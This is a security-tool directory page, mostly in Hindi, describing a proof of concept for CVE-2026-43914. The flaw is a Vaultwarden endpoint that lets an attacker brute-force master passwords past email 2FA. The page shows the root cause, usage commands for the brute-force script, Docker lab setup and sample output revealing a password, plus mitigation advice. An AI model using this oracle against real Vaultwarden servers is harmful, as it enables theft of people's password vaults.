Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-43914-PoC — CVE-2026-43914 के लिए PoC: Vaultwarden <1.35.4 email-2FA ब्रूट-फोर्स बायपास पासवर्ड ओरेकल। Stdlib-only Python। | Kitploit
उपकरण/GitHubGitHub/boreas37/cve-2026-43914-poc
पासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubboreas37/cve-2026-43914-poc

CVE-2026-43914-PoC

CVE-2026-43914 के लिए PoC: Vaultwarden <1.35.4 email-2FA ब्रूट-फोर्स बायपास पासवर्ड ओरेकल। Stdlib-only Python।

रिपॉजिटरी देखें
20 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-43914 — Vaultwarden ईमेल-2FA ब्रूट-फोर्स सुरक्षा बायपास

CVE-2026-43914 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: जब ईमेल 2FA सक्षम होता है, तो Vaultwarden की लॉगिन ब्रूट-फोर्स सुरक्षा को बिना प्रमाणीकरण वाले POST /api/two-factor/send-email-login एंडपॉइंट के माध्यम से पूरी तरह से बायपास किया जा सकता है, जो एक असीमित मास्टर-पासवर्ड ओरेकल के रूप में कार्य करता है।

प्रभावित: Vaultwarden < 1.35.4

यह क्यों मायने रखता है

Vaultwarden सबसे लोकप्रिय सेल्फ-होस्टेड Bitwarden-संगत पासवर्ड मैनेजर है। एडमिन ईमेल 2FA को यह मानकर सक्षम करते हैं कि यह पासवर्ड अनुमान लगाने को रोकता है — लेकिन यह एंडपॉइंट मास्टर पासवर्ड हैश को सत्यापित करता है और सही/गलत अनुमानों के लिए एक अलग HTTP स्थिति लौटाता है किसी भी दर सीमा या खाता लॉकआउट लागू होने से पहले:

प्रतिक्रियाअर्थ
200पासवर्ड सही (OTP ईमेल भेजा गया)
400 "Username or password is incorrect"पासवर्ड गलत

एक हमलावर जो पीड़ित का ईमेल जानता है (या अनुमान लगाता है) वह बिना किसी थ्रॉटलिंग के पूरी गति से मास्टर पासवर्ड ब्रूट-फोर्स कर सकता है। ईमेल 2FA इसे नहीं रोकता है।

मूल कारण (स्रोत से, v1.35.3)

src/api/core/two_factor/email.rs में, send_email_login हैंडलर पासवर्ड की जाँच करता है और बेमेल होने पर जल्दी लौट जाता है — लेकिन यह रूट उस ब्रूट-फोर्स/सीमित मिडलवेयर के साथ पंजीकृत नहीं है जो /identity/connect/token की सुरक्षा करता है। प्रत्येक कॉल:

  1. ईमेल द्वारा उपयोगकर्ता को खोजता है,
  2. check_valid_password(master_password_hash) की तुलना करता है → बेमेल पर err!("Username or password is incorrect") (HTTP 400),
  3. सफलता पर OTP उत्पन्न करके ईमेल करता है और HTTP 200 लौटाता है।

उपयोग

root@kitploit:~
python3 vw_bf_poc.py --host localhost --port 8222 \
    --email [email protected] \
    --passwords "summer2024,Qwerty123!,CorrectHorse123!"

# or a wordlist:
python3 vw_bf_poc.py --email [email protected] --wordlist rockyou-top1000.txt

केवल Python 3 stdlib।

लैब (पुनरुत्पादन)

root@kitploit:~
# mail catcher
docker run -d --name mailhog -p 11025:1025 -p 18025:8025 mailhog/mailhog

# vulnerable Vaultwarden (< 1.35.4), SMTP -> MailHog
docker run -d --name vw-lab -p 8222:80 --link mailhog \
  -e I_REALLY_WANT_VOLATILE_STORAGE=true \
  -e SMTP_HOST=mailhog -e SMTP_PORT=1025 -e SMTP_SECURITY=off \
  -e [email protected] -e DOMAIN=http://localhost:8222 \
  vaultwarden/server:1.35.3

एक परीक्षण उपयोगकर्ता बनाएँ (कोई भी Bitwarden क्लाइंट या API), ईमेल 2FA सक्षम करें (सेटिंग्स → टू-स्टेप लॉगिन → ईमेल), फिर इसके विरुद्ध PoC चलाएँ।

सत्यापित आउटपुट

root@kitploit:~
$ python3 vw_bf_poc.py --email [email protected] --passwords "wrong1,wrong2,CorrectHorse123!"
[*] Target : localhost:8222
[*] Victim : [email protected]
[*] Trying 3 candidate passwords via send-email-login oracle

  [0001] 400  -  wrong1
  [0002] 400  -  wrong2
  [0003] 200  HIT!  CorrectHorse123!

=> PASS: master password FOUND = 'CorrectHorse123!'  (1.4s, no rate limit hit)

निवारण

Vaultwarden 1.35.4+ में अपग्रेड करें। तब तक: TOTP/WebAuthn के पक्ष में ईमेल 2FA अक्षम करें, और इंस्टेंस को /api/two-factor/* पर प्रति-IP दर सीमा के साथ एक रिवर्स प्रॉक्सी के पीछे रखें।

संदर्भ

  • GHSA-c5rv-q295-7w4g (dani-garcia/vaultwarden एडवाइजरी)
  • Neodyme एडवाइजरी: cve-2026-43914

अस्वीकरण

केवल अधिकृत सुरक्षा अनुसंधान और प्रयोगशाला उपयोग के लिए।

टूल डाउनलोड करें